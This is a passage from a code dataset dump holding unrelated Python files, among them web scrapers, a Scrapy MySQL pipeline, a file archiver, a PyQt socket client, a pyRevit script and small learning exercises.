7)])\r\n\t\tall_list_pages.extend([self.going_to_crawl_single.format(i) for i in range(1, 3)])\r\n\t\tprint(len(all_list_pages))\r\n\t\twhile all_list_pages:\r\n\t\t\tprint(all_list_pages)\r\n\t\t\tdriver = webdriver.Chrome(executable_path='C:/Program Files (x86)/Google/Chrome/Application/chromedriver.exe',options=self.chrome_options)\r\n\r\n\t\t\ttime.sleep(1)\r\n\t\t\tcurrent_page = all_list_pages[0]\r\n\t\t\tjs = \"window.open({})\".format('\"' + self.duplicate_part + current_page + '\"') # 可以看到是打开新的标签页 不是窗口\r\n\t\t\t# print(js)\r\n\t\t\ttime.sleep(1)\r\n\t\t\tdriver.execute_script(js)\r\n\t\t\ttime.sleep(2)\r\n\t\t\tall_list_pages.pop(all_list_pages.index(all_list_pages[0]))\r\n\t\t\tdriver.implicitly_wait(20)\r\n\t\t\ttime.sleep(1)\r\n\t\t\tdriver.switch_to_window(driver.window_handles[1])\r\n\t\t\tcurrent_times = time.localtime(time.time())\r\n\t\t\tprint(current_times)\r\n\t\t\t# print(driver.page_source[:500])\r\n\t\t\tif ' cell.left:\n new.right = cell.left\n self.direction = not self.direction\n if last.left >= cell.right and new.left < cell.right:\n new.left = cell.right\n self.direction = not self.direction\n if last.bottom <= cell.top and new.bottom > cell.top:\n self.resting = True\n new.bottom = cell.top\n self.dy = 0\n if last.top >= cell.bottom and new.top < cell.bottom:\n new.top = cell.bottom\n self.dy = 0\n\n if self.rect.x >= game.width:\n self.rect.x = -15\n\n if self.rect.x <= -16:\n self.rect.x = game.width\n\n if self.rect.y >= game.height:\n self.is_dead = True\n","sub_path":"super-fruit-pie-master/gamelib/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"155990789","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nimport MySQLdb.cursors\nfrom twisted.enterprise import adbapi\n\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom scrapy.utils.project import get_project_settings\nimport os, logging\n\nSETTINGS = get_project_settings()\n\nclass AmazonCnCrawlerPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\n\n\nclass MySQLPipeline(object):\n\n\t@classmethod\n\tdef from_crawler(cls, crawler):\n\t\treturn cls(crawler.stats)\n\n\tdef __init__(self, stats):\n\t\t#Instantiate DB\n\t\tself.dbpool = adbapi.ConnectionPool('MySQLdb',\n\t\t\thost=SETTINGS['DB_HOST'],\n\t\t\tuser=SETTINGS['DB_USER'],\n\t\t\tpasswd=SETTINGS['DB_PASSWD'],\n\t\t\tport=SETTINGS['DB_PORT'],\n\t\t\tdb=SETTINGS['DB_DB'],\n\t\t\tcharset='utf8',\n\t\t\tuse_unicode = True,\n\t\t\tcursorclass=MySQLdb.cursors.DictCursor\n\t\t)\n\t\tself.stats = stats\n\t\tdispatcher.connect(self.spider_closed, signals.spider_closed)\n\tdef spider_closed(self, spider):\n\t\t\"\"\" Cleanup function, called after crawing has finished to close open\n\t\t\tobjects.\n\t\t\tClose ConnectionPool. \"\"\"\n\t\tself.dbpool.close()\n\n\tdef process_item(self, item, spider):\n\t\tquery = self.dbpool.runInteraction(self.__insert_if_not_exist, item)\n\t\tquery.addErrback(self._handle_error)\n\t\treturn item\n\n\tdef __insert_if_not_exist(self,tx,item):\n\t\tsql = \"SELECT id from amazon_item where amazon_id = %s\"\n\t\tres = tx.execute(sql,(item['amazon_id'],))\n\t\tif res == 0:\n\t\t\tlogging.debug(\"Insert Amazon item (amazon_id=%s).\" %item['amazon_id'])\n\t\t\t#1. Insert item into amamzon_item\n\t\t\tsql = \"INSERT INTO \\\n\t\t\t\t\t\tamazon_item (name,amazon_id,amazon_category_id,price,additional_charge,oversea_product,third_party,item_link,picture_url) \\\n\t\t\t\t\t\tVALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t\n\t\t\tresult = tx.execute(sql,(\n\t\t\t\t\t\t\t\t\titem['name'],\n\t\t\t\t\t\t\t\t\titem['amazon_id'],\n\t\t\t\t\t\t\t\t\titem['category_id'],\n\t\t\t\t\t\t\t\t\titem['price'],\n\t\t\t\t\t\t\t\t\titem['additionalCharge'],\n\t\t\t\t\t\t\t\t\titem['overseaProduct'],\n\t\t\t\t\t\t\t\t\titem['thirdParty'],\n\t\t\t\t\t\t\t\t\titem['itemLink'],\n\t\t\t\t\t\t\t\t\titem['pictureURL'],\n\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t)\n\t\t\t#2. Insert category into amazon_category if it's not existed\n\t\t\tcategoryInfoList = item['categoryPathInfo']\n\t\t\tcatIDs = [catID for (_,catID) in categoryInfoList]\n\t\t\tcatIDs = tuple(catIDs)\n\t\t\tsql = \"SELECT distinct(amazon_category_id) from amazon_category where amazon_category_id in (\"\n\t\t\tfor _ in categoryInfoList:\n\t\t\t\tsql=sql+\"%s,\"\n\t\t\tsql = sql[0:len(sql)-1]+\")\"\n\t\t\ttx.execute(sql,catIDs)\n\t\t\tresults = tx.fetchall()\n\t\t\texistedCatIDs = [row['amazon_category_id'].encode('utf-8') for row in results]\n\t\t\t\n\t\t\tsql = \"insert into amazon_category (name,amazon_category_id,parent_category_id,category_path,category_display_path) values (%s,%s,%s,%s,%s)\"\n\t\t\tcategory_path_nodes = []\n\t\t\tdisplay_path_nodes = []\n\t\t\tparentCategoryID = \"\"\n\t\t\tfor (catName,catID) in categoryInfoList:\n\t\t\t\tcategory_path_nodes.append(catID)\n\t\t\t\tdisplay_path_nodes.append(catName)\n\t\t\t\tif not existedCatIDs.__contains__(catID):\n\t\t\t\t\ttx.execute(sql,(catName,catID,parentCategoryID,\",\".join(category_path_nodes),\">\".join(display_path_nodes)))\n\t\t\t\tparentCategoryID = catID\n\n\t\t\tself.stats.inc_value('database/items_added')\n\t\telse:\n\t\t\tlogging.debug(\"Duplicated item(amazon_id=%s), ignore it!\" %item['amazon_id'])\n\t\t\n\t\n\tdef _handle_error(self, e):\n\t\tlogging.error(\"DB operating ERROR:%s\" %e) ","sub_path":"amazon_cn_crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163620459","text":"p1_name = input(\"Player 1 name:\")\np2_name = input(\"Player 2 name:\")\nstart = input(\"Start game?\")\nwhile start == \"yes\":\n\tgame_dict = {\"rock\": 1, \"paper\": 2,\"scissor\": 3}\n\tp1_choice = input(\"Player 1 turn:\")\n\tp2_choice = input(\"Player 2 turn:\")\n\tcompare = game_dict.get(p1_choice) - game_dict.get(p2_choice)\n\tif compare == 0:\n\t\tprint(\"Tie\")\n\telif compare in [-1,2]:\n\t\tprint(p2_name, \"wins!!!\")\n\telif compare in [1,-2]:\n\t\tprint(p1_name, \"winss!!!\")\n\tstart = input(\"Continue playing:\")\t\n","sub_path":"PP8.py","file_name":"PP8.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"202633821","text":"#!/usr/bin/python\r\n#THIS NEED TO BE HERE TO PROPERLY CALL THE SCRIPT WITHOUT THE PYTHON KEYWORD\r\n#THE COMMAND DOS2UNIX NEEDS TO BE RUN ANYTHIME THIS SCRIPT IS UPDATE ON A WINDOWS MACHINE\r\n\r\n###################################################################################### \r\n# Auto Archiver - Written By: Elliot Carter\r\n#\r\n# This Script takes in several different inputs for directory paths and archives the\r\n# folders/files inside based off of the names containing a specific string that represents \r\n# the month and year that the file was created in. It then zips the files together into monthly zips \r\n# and archives them into the specified folder.\r\n#\r\n###################################################################################### \r\n\r\n#Import \r\nimport os\r\nimport re\r\nimport glob\r\nimport shutil\r\nimport datetime\r\nimport time\r\nimport itertools\r\nimport zipfile\r\nfrom zipfile import ZipFile \r\n\r\n#Variable to delete files after archive 0 if you DO NOT want to delete and 1 if you DO####################\r\nDELETE_FILES = 0\r\n################################################################################\r\n\r\n#List of current PATH_TO_ENVIRONMENTS############################################################\r\nPATH_TO_ENVIRONMENTS = ['C:/dserver01/DEV/',\r\n 'C:/iserver01/ITE/',\r\n 'C:/sserver01/SYS/',\r\n 'C:/pserver01/PROD/']\r\n#Current Environment used in naming the zip file i.e. DEV, SYS, ITE, PROD\r\nENVIRONMENTS = ['DEV', 'ITE', 'SYS', 'PROD']\r\n\r\n##################################################################################################\r\n\r\n#List of all directories inside all environments with FOLDERS to zip\r\nPATH_TO_FOLDERS = ['Input/EODPolicy/Filtered/',\r\n 'Input/Events/Filtered/',\r\n 'Input/Party/Filtered/',\r\n 'Input/Policy/Filtered/',\r\n 'Input/Relationship/Filtered/',\r\n 'Input/Transaction/Filtered/',\r\n 'Process/archive/',] \r\n \r\n#List of all directories inside all environments with txt FILES to zip\r\nPATH_TO_FILES = ['Input/Party/',\r\n 'Process/reconciliation/','Process/archive/output/EODPolicy/',\r\n 'Process/archive/output/Events/',\r\n 'Process/archive/output/Party/',\r\n 'Process/archive/output/Policy/',\r\n 'Process/archive/output/Relationship/',\r\n 'Process/archive/output/Transaction/',\r\n ]\r\n \r\n#Pattern list of dates that need archiving for folders\r\nPATTERN_DATE_FOR_FOLDERS = ['08-..-2018',\r\n '09-..-2018',\r\n '10-..-2018', \r\n '11-..-2018',\r\n '12-..-2018',\r\n '01-..-2019',\r\n '02-..-2019',\r\n '03-..-2019', \r\n '04-..-2019']\r\n \r\n#Pattern list of dates that need archiving for files\r\nPATTERN_DATE_FOR_FILES = ['08..2018',\r\n '09..2018',\r\n '10..2018', \r\n '11..2018',\r\n '12..2018',\r\n '01..2019',\r\n '02..2019',\r\n '03..2019', \r\n '04..2019'] \r\n\r\n#Location where all zip file will be placed withing the current environment by month.. i.e. '//server/environmentName/zip_location/MM-YYYY' \r\nZIP_LOCATION = 'Zip/'\r\n\r\n#List of lists including all zips created and their files i.e.[zip_name,[zip_files]\r\nZIPS_CREATED = []\r\n \r\n#Creates the name of the zip file \r\n# date = month and year or the files being archived... i.e. 'MM-YYYY'\r\n# path_to_folder = path leading to but not including the file to be archived... i.e. 'Process/Archive/output/EODPolicy/' ##TRAILING / MUST BE INCLUDED IN PATH NAME ##\r\n# path_to_environment = path leading to the environment of the file to be archived.. i.e. //server/environmentName/' ##TRAILING / MUST BE INCLUDED IN PATH NAME ##\r\n#\r\n# Returns string containing the zip name\r\ndef get_zip_file_name(date, path_to_folder, path_to_environment):\r\n #split path_to_folder\r\n path_to_folder_split = path_to_folder.split('/') \r\n #insert the environment name into the front of the path list and then create zip name with list\r\n envIndex = PATH_TO_ENVIRONMENTS.index(path_to_environment) \r\n path_to_folder_split.insert(0,ENVIRONMENTS[envIndex])\r\n zip_file_name = ''.join(path_to_folder_split)+ '-' + date + '.zip'\r\n return zip_file_name \r\n\r\n\r\n#Takes a list of files their current directory the name of a zip and the location where the zips are to be placed and zips them all up and places them in specified directory.\r\n# \r\n# file_list = a list of paths to each file found matching the current patern... i.e. ['//server/environmentName/Process/Archive/output/Events\\\\EventCo18_00001.txt',...]\r\n# directory = path to current directory being searched... i.e. //server/environmentName/Process/Archive/output/Events/ \r\n# zip_file_name = the name of the file to be zipped... i.e. DEVInputEODPolicyFiltered-09-2018.zip\r\n# environment = path to current environment... i.e. //server/environmentName/\r\n# date = date of current search... i.e. MM-YYYY\r\n# delete_folder = boolean to delete the folder the files are in (1) for true or (0) for false\r\ndef archive_files(file_list,directory,zip_file_name,environment,date,delete_folder):\r\n zip_location = environment + ZIP_LOCATION + date + '/'\r\n orig_zip_file_name = zip_file_name\r\n zip_file_name = zip_location + zip_file_name\r\n #temp list for the files added to the zip\r\n temp_zip_file_list = []\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + 'Create zip file named: ' + zip_file_name)\r\n if not os.path.exists(zip_location):\r\n os.makedirs(zip_location) \r\n #variable for deleting the directory found after the archive\r\n dirToRemove = ''\r\n #writing files to a zipfile\r\n newZip = None\r\n try:\r\n newZip = zipfile.ZipFile(zip_file_name, 'w',zipfile.ZIP_DEFLATED)\r\n for file in file_list: \r\n newZip.write(file)\r\n temp_zip_file_list.append(file)\r\n \r\n finally:\r\n newZip.close() \r\n\r\n ############THIS NEXT LINES DELETE THE FILES AND EMPTY FOLDERS THAT HAVE JUST BEEN ARCHIVED##############\r\n if DELETE_FILES == 1:\r\n for file in file_list:\r\n dirToRemove = os.path.split(file)[0] \r\n try:\r\n os.remove(file)\r\n except OSError as e: # name the Exception `e`\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print (now + \"Failed with:\", e.strerror) # look what it says\r\n print (now + \"Error code:\", e.code)\r\n #if directory is empty and we want to delete the base folder\r\n if not os.listdir(dirToRemove):\r\n if delete_folder:\r\n try:\r\n shutil.rmtree(dirToRemove)\r\n except Exception as e:\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + ' ' + e)\r\n raise\r\n ########################################################################################\r\n \r\n temp_array = [str(orig_zip_file_name),temp_zip_file_list] \r\n ZIPS_CREATED.append(temp_array)\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + 'All files zipped successfully!') \r\n print(\" \") \r\n \r\n#Searches through all directories in the PATH_TO_FOLDERS list for any folders matching the PATTERN_DATE_FOR_FOLDERS list and archives \r\n#them by path and pattern and places them into the ZIP_LOCATION + MM-YYYY of the current environment.\r\n#\r\n# Returns Total Number of files found \r\ndef folders_archive():\r\n #var to hold boolean for deleting the folder containing the files\r\n delete_folder = 1\r\n #Total files found\r\n total_files = 0\r\n #loop through all dates in the dates to archive\r\n for date in PATTERN_DATE_FOR_FOLDERS:\r\n #convert date to dd-yyyy\r\n real_date = date[0:3] + date[6:10] \r\n #set environment variable\r\n for environment in PATH_TO_ENVIRONMENTS:\r\n #loop through every directory path that archives by folder\r\n for folder in PATH_TO_FOLDERS:\r\n #var for zip file name \r\n zip_file_name = get_zip_file_name(real_date,folder,environment)\r\n #var for list of filepaths including filename\r\n file_list = []\r\n #var to hold number of folders found per path\r\n num_folders = 0\r\n #create each full_path call\r\n full_path = environment+folder \r\n #validate full_path exists: if it does search through it Otherwise: print out directory does not exist\r\n if os.path.isdir(full_path):\r\n #update variable with the current directory of folders\r\n curr_dir_folders = next(os.walk(full_path))[1]\r\n #loop through all folders in current directory\r\n for folder in curr_dir_folders:\r\n #check all dates against the folder name\r\n if re.search(date,folder):\r\n #create pattern looking for all files in the current folder\r\n glob_pattern = full_path + folder + \"/*\"\r\n #add all files found to the file_list var\r\n file_list += glob.glob(glob_pattern) \r\n num_folders += 1\r\n #if folders are found containing files print where they were found and archive them\r\n if(num_folders > 0): \r\n #archiving will happen in this function call\r\n archive_files(file_list,full_path,zip_file_name,environment,real_date,delete_folder)\r\n total_files += num_folders\r\n else:\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + full_path + ' does not exist.') \r\n print(' ')\r\n return total_files \r\n \r\n#Searches through all directories in the PATH_TO_FILES list for any files of a specified file type (file_ext) matching the PATTERN_DATE_FOR_FOLDERS list and archives \r\n#them by path and pattern and places them into the ZIP_LOCATION + MM-YYYY of the current environment.\r\n#\r\n# file_ext = the extension of the type of file you want to archive. I.E. txt, csv, or * for all files\r\n#\r\n# Returns Total Number of files found \r\ndef files_archive(file_ext): \r\n #set environment variable\r\n for environment in PATH_TO_ENVIRONMENTS:\r\n #loop through every directory path that archives by folder\r\n for path in PATH_TO_FILES:\r\n #create each directory call\r\n directory = environment+path\r\n #validate directory exists: if it does print the directory \r\n if os.path.isdir(directory):\r\n #create pattern looking for all files in the current folder\r\n glob_pattern = directory + '*.' + file_ext\r\n #add all files found to the file_list var\r\n file_list = glob.glob(glob_pattern) \r\n #var to hold boolean for deleting the folder containing the files\r\n delete_folder = 0\r\n #var to hold total number of files found\r\n total_files = 0\r\n #var to hold zip name\r\n zip_file_name = '' #placeholder \r\n #var to hold current zip file name \r\n for date in PATTERN_DATE_FOR_FILES:\r\n #Convert date to dd-yyyy\r\n real_date = date[0:2] + '-' + date[4:8] \r\n files_to_archive = []\r\n #var to hold number of files found per directory\r\n num_files = 0\r\n for file in file_list:\r\n zip_file_name = get_zip_file_name(real_date,path,environment) \r\n if re.search(date,file):\r\n files_to_archive.append(file) \r\n num_files += 1\r\n total_files += 1\r\n if num_files != 0:\r\n #archive the files\r\n archive_files(files_to_archive,directory,zip_file_name,environment,real_date,delete_folder) \r\n else:\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + directory + ' does not exist.') \r\n return total_files\r\n \r\n#Runs the Program \r\ndef main():\r\n print('')\r\n print('------------------------- This is the start of a new output -------------------------')\r\n folders_archive()\r\n files_archive('csv')\r\n files_archive('txt')\r\n #Print summary of files archived\r\n print('')\r\n print('')\r\n print('')\r\n print('')\r\n print('')\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + str(len(ZIPS_CREATED)) + ' zipped archives created. See Below:')\r\n \r\n for list in sorted(ZIPS_CREATED):\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print (now + list[0]) \r\n print (now + 'with files') \r\n for file in list[1]:\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print (now + file)\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + str(len(list[1])) + ' files zipped')\r\n \r\n print(now + str(len(ZIPS_CREATED)) + ' total zipped archives created.')\r\n print('')\r\n print('')\r\n print('')\r\n print('')\r\n print('')\r\n \r\n return 0\r\n\r\n#needed to run main \r\nif __name__ == \"__main__\": \r\n main()","sub_path":"AutoArchiver.py","file_name":"AutoArchiver.py","file_ext":"py","file_size_in_byte":15022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"432565837","text":"from collections import namedtuple\n\n\nLogEntry = namedtuple(\"LogEntry\", (\n \"short_hash\",\n \"long_hash\",\n \"summary\",\n \"raw_body\",\n \"author\",\n \"email\",\n \"datetime\"\n ))\n\n\nclass HistoryMixin():\n\n def log(self, limit=None, skip=None, author=None, fpath=None, start_end=None, reverse=False):\n\n log_output = self.git(\n \"log\",\n \"-{}\".format(limit) if limit else None,\n \"--skip={}\".format(skip) if skip else None,\n \"--author={}\".format(author) if author else None,\n \"--reverse\" if reverse else None,\n '--format=%h%n%H%n%s%n%an%n%ae%n%at%x00%B%x00%x00%n',\n \"{}..{}\".format(*start_end) if start_end else None,\n \"--\" if fpath else None,\n fpath\n ).strip(\"\\x00\")\n\n entries = []\n for entry in log_output.split(\"\\x00\\x00\\n\"):\n entry = entry.strip()\n if not entry:\n continue\n entry, raw_body = entry.split(\"\\x00\")\n\n short_hash, long_hash, summary, author, email, datetime = entry.split(\"\\n\")\n entries.append(LogEntry(short_hash, long_hash, summary, raw_body, author, email, datetime))\n\n return entries\n","sub_path":"core/git_mixins/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"405652729","text":"def scope_test():\n def do_local():\n spam = \"local spam\"\n\n def do_nonlocal():\n nonlocal spam\n spam = \"nonlocal spam\"\n\n def do_global():\n global spam\n spam = \"global spam\"\n\n spam = \"test spam\"\n do_local()\n print(\"After local assignment:\", spam)\n do_nonlocal()\n print(\"After nonlocal assignment:\", spam)\n do_global()\n print(\"After global assignment:\", spam)\n\nscope_test()\nprint(\"In global scope:\", spam)\n\nfor element in [1, 2, 3]:\n print(element)\n\nclass Reverse:\n \"\"\"Iterator for looping over a sequence backwards.\"\"\"\n def __init__(self, data):\n self.data = data\n self.index = len(data)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index == 0:\n raise StopIteration\n self.index = self.index - 1\n return self.data[self.index]\n\nrev = Reverse('spam')\niter(rev)\nfor char in rev:\n print(char)\n\n","sub_path":"Novice/01-03/Latihan/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177599491","text":"import sys\r\nfrom PyQt5 import QtCore\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import QMainWindow\r\nimport login\r\nfrom socket import *\r\nfrom PyQt5.QtWidgets import QApplication\r\nimport systemTray\r\n\r\nclass Window(QMainWindow):\r\n def __init__(self):\r\n QMainWindow.__init__(self)\r\n #서버연결\r\n port = 3333\r\n self.clientSock = socket(AF_INET, SOCK_STREAM)\r\n self.clientSock.connect(('34.84.112.149', port))\r\n #self.clientSock.connect(('192.168.0.6', port))\r\n # self.clientSock.connect(('192.168.43.36', port))\r\n # self.clientSock.connect(('192.168.25.22', port))\r\n #self.clientSock.connect(('192.168.0.31', port))\r\n #self.clientSock.connect(('172.30.1.58', port)) \r\n #self.clientSock.connect(('172.30.1.21', port)) \r\n\r\n #트레이 아이콘 생성\r\n self.tray = systemTray.SystemTrayIcon(self)\r\n\r\n # 첫 화면 로그인 설정\r\n self.user = {'email':'','bb_url':'','is_prof':''}\r\n self.login = login.login(self)\r\n\r\n self.init_window()\r\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\r\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\r\n self.setContentsMargins(0,0,5,5)\r\n self.oldPos = self.pos()\r\n\r\n def quitClicked(self):\r\n commend = 'exit'\r\n self.clientSock.send(commend.encode('utf-8'))\r\n QApplication.quit()\r\n\r\n def init_window(self):\r\n self.setCentralWidget(self.login)\r\n\r\n def mousePressEvent(self, event):\r\n self.oldPos = event.globalPos()\r\n\r\n def mouseMoveEvent(self, event):\r\n delta = QPoint(event.globalPos() - self.oldPos)\r\n self.move(self.x() + delta.x(), self.y() + delta.y())\r\n self.oldPos = event.globalPos()\r\n\r\nif __name__ == '__main__':\r\n\r\n app = QApplication(sys.argv)\r\n w = Window()\r\n w.show()\r\n sys.exit(app.exec_())","sub_path":"client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"202752016","text":"\"\"\"Toggles background of views between white and black\"\"\"\n\n__author__ = 'Brett Beckemeyer (bbeckemeyer@cannondesign.com)'\nfrom pyrevit import revit, DB\nfrom pyrevit import script\nfrom pyrevit.coreutils.ribbon import ICON_MEDIUM\n\n# for timing -------------------------------------------------------------------\nfrom pyrevit.coreutils import Timer\ntimer = Timer()\n# ------------------------------------------------------------------------------\n\n\nfrom System.Collections.Generic import List\n\nimport Autodesk.Revit.DB as DB\n\napp = __revit__.Application\n\n# not used ----------------------------------\n#doc = __revit__.ActiveUIDocument.Document\n#uidoc = __revit__.ActiveUIDocument\n#app = UIApplication.Application\n# --------------------------------------------\n\n#----------SETUP COLORS FOR CHECKING----------\ncheck_black = []\ncheck_white = []\nbg_check = []\n\ncolor_black = DB.Color(0,0,0)\ncolor_white = DB.Color(255,255,255)\n\ncheck_black.append(color_black.Red)\ncheck_black.append(color_black.Green)\ncheck_black.append(color_black.Blue)\n\ncheck_white.append(color_white.Red)\ncheck_white.append(color_white.Green)\ncheck_white.append(color_white.Blue)\n#---------------------------------------------\n#bg_col = app.BackgroundColor\n#\n#bg_check.append(bg_col.Red)\n#bg_check.append(bg_col.Green)\n#bg_check.append(bg_col.Blue)\n#---------------------------------------------\n\ndef get_bg_col(abc):\n bg_check.append(abc.Red)\n bg_check.append(abc.Green)\n bg_check.append(abc.Blue)\n return bg_check\n\n\ndef __selfinit__(script_cmp, ui_button_cmp, __rvt__):\n try:\n abc = app.BackgroundColor\n bg_check1 = get_bg_col(abc)\n if bg_check1 == check_black:\n #print('Background is black!')\n bg_state = False\n elif bg_check1 == check_white:\n #print('Background is not white!')\n bg_state = True\n else:\n exit()\n script.toggle_icon(bg_state)\n return True\n except:\n return False\n\n\ndef toggle_state():\n abc = app.BackgroundColor\n bg_check2 = get_bg_col(abc)\n\n if bg_check2 == check_black:\n #print('Background is black!')\n app.BackgroundColor = color_white\n bg_state = True\n elif bg_check2 == check_white:\n #print('Background is not black!')\n app.BackgroundColor = color_black\n bg_state = False\n else:\n exit()\n\n script.toggle_icon(bg_state)\n\n\nif __name__ == '__main__':\n toggle_state()\n\n# for timing -------------------------------------------------------------------\n#endtime = timer.get_time()\n#print(endtime)\n# ------------------------------------------------------------------------------\n","sub_path":"00_NEW EXTENSIONS/Background.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"543221722","text":"import logging\nimport requests\nimport sys\nimport operator\nimport os\nimport functools\n\nimport pandas as pd\n\nfrom bs4 import BeautifulSoup\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nimport http.client as http\n\n# status = sys.argv[1] if sys.argv[1] else 'INFO'\n\n# http.HTTPConnection.debuglevel = 1\n\n# logging.basicConfig()\n\n# logger = logging.getLogger()\n# logger.setLevel(getattr(logging, status))\n\n# requests_log = logging.getLogger(\"requests.packages.urllib3\")\n# requests_log.setLevel(getattr(logging, status))\n# requests_log.propagate = True\n\n\ndef login(func):\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n\n payload = {\n 'user.username': os.getenv('MED_USER'),\n 'userSecurity.password': os.getenv('MED_PASS'),\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0'\n }\n sess = requests.Session()\n sess.headers.update(headers)\n sess.post(\n \"https://services.aamc.org/30/ssoLogin/home/login/process\",\n data=payload\n )\n request = func(sess, *args, **kwargs)\n\n return request\n\n return wrapper\n\n\ndef scrape_parallel(start, end):\n\n msar = 'https://services.aamc.org/30/msar/schoolDetails/%d/about'\n pool = ThreadPool(8)\n\n links = [(msar % i) for i in range(start, end)]\n\n # logger.info('Started from %s to %s' % (start, end))\n\n bucket = pool.map(requests.get, links)\n html = [BeautifulSoup(req.content) for req in bucket]\n\n return [soup.find_all('div', id='schoolInfo') for soup in html]\n\n\n@login\ndef get_df(session):\n\n req = session.post(\"https://services.aamc.org/30/msar/search/resultData\", data={\n 'limit': 1000\n }).json()['searchResults']['rows']\n\n df = pd.DataFrame(req)\n return df.set_index('key')\n\n\n@login\ndef get_html(session, n, category='schoolInfo'):\n msar = 'https://services.aamc.org/30/msar/%s/%d/about' % (category, n)\n req = session.get(msar)\n\n if not req.ok:\n req.raise_for_status()\n\n return BeautifulSoup(req.content)\n\ndef discover_schools(start, end):\n legit = []\n pool = ThreadPool(8)\n results = pool.map(get_html, range(start, end + 1))\n\n return [discard(i) for i in results]\n\ndef discard(result):\n if 'Sign In' in result.title.text:\n raise IOError('Not Logged In')\n if 'ERROR' in result.title.text:\n None\n else:\n return True\n\nif __name__ == '__main__':\n schema = scrape_parallel(0,2)\n print(schema[0])\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"229261025","text":"#############################################################################\n### Търсене и извличане на информация. Приложение на дълбоко машинно обучение\n### Стоян Михов\n### Зимен семестър 2020/2021\n##########################################################################\n###\n### Домашно задание 3\n###\n#############################################################################\n\nimport random\n\ncorpusSplitString = '@\\n'\nmaxPoemLength = 10000\nsymbolCountThreshold = 100\n\ndef splitSentCorpus(fullSentCorpus, testFraction = 0.1):\n random.seed(42)\n random.shuffle(fullSentCorpus)\n testCount = int(len(fullSentCorpus) * testFraction)\n testSentCorpus = fullSentCorpus[:testCount]\n trainSentCorpus = fullSentCorpus[testCount:]\n return testSentCorpus, trainSentCorpus\n\ndef getAlphabet(corpus):\n symbols={}\n for s in corpus:\n for c in s:\n if c in symbols: symbols[c] += 1\n else: symbols[c]=1\n return symbols\n\ndef prepareData(corpusFileName, startChar, endChar, unkChar, padChar):\n file = open(corpusFileName,'r')\n poems = file.read().split(corpusSplitString)\n symbols = getAlphabet(poems)\n \n assert startChar not in symbols and endChar not in symbols and unkChar not in symbols and padChar not in symbols\n charset = [startChar,endChar,unkChar,padChar] + [c for c in sorted(symbols) if symbols[c] > symbolCountThreshold]\n char2id = { c:i for i,c in enumerate(charset)}\n \n corpus = []\n for i,s in enumerate(poems):\n if len(s) > 0:\n corpus.append( [startChar] + [ s[i] for i in range(min(len(s),maxPoemLength)) ] + [endChar] )\n\n testCorpus, trainCorpus = splitSentCorpus(corpus, testFraction = 0.01)\n print('Corpus loading completed.')\n return testCorpus, trainCorpus, char2id\n","sub_path":"hw-3/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"346302336","text":"#!/usr/bin/env python\nimport socket as sk\nHost=\"10.5.5.1\"\nPort=12346\ns=sk.socket(sk.AF_INET, sk.SOCK_STREAM)\ns.bind((Host, Port))\ns.listen(1)\nwhile(True):\n conn, addr = s.accept()\n print(\"Connnected by: \", addr)\n while True:\n data = conn.recv(64)\n if not data:\n print(\"------>\")\n break;\n 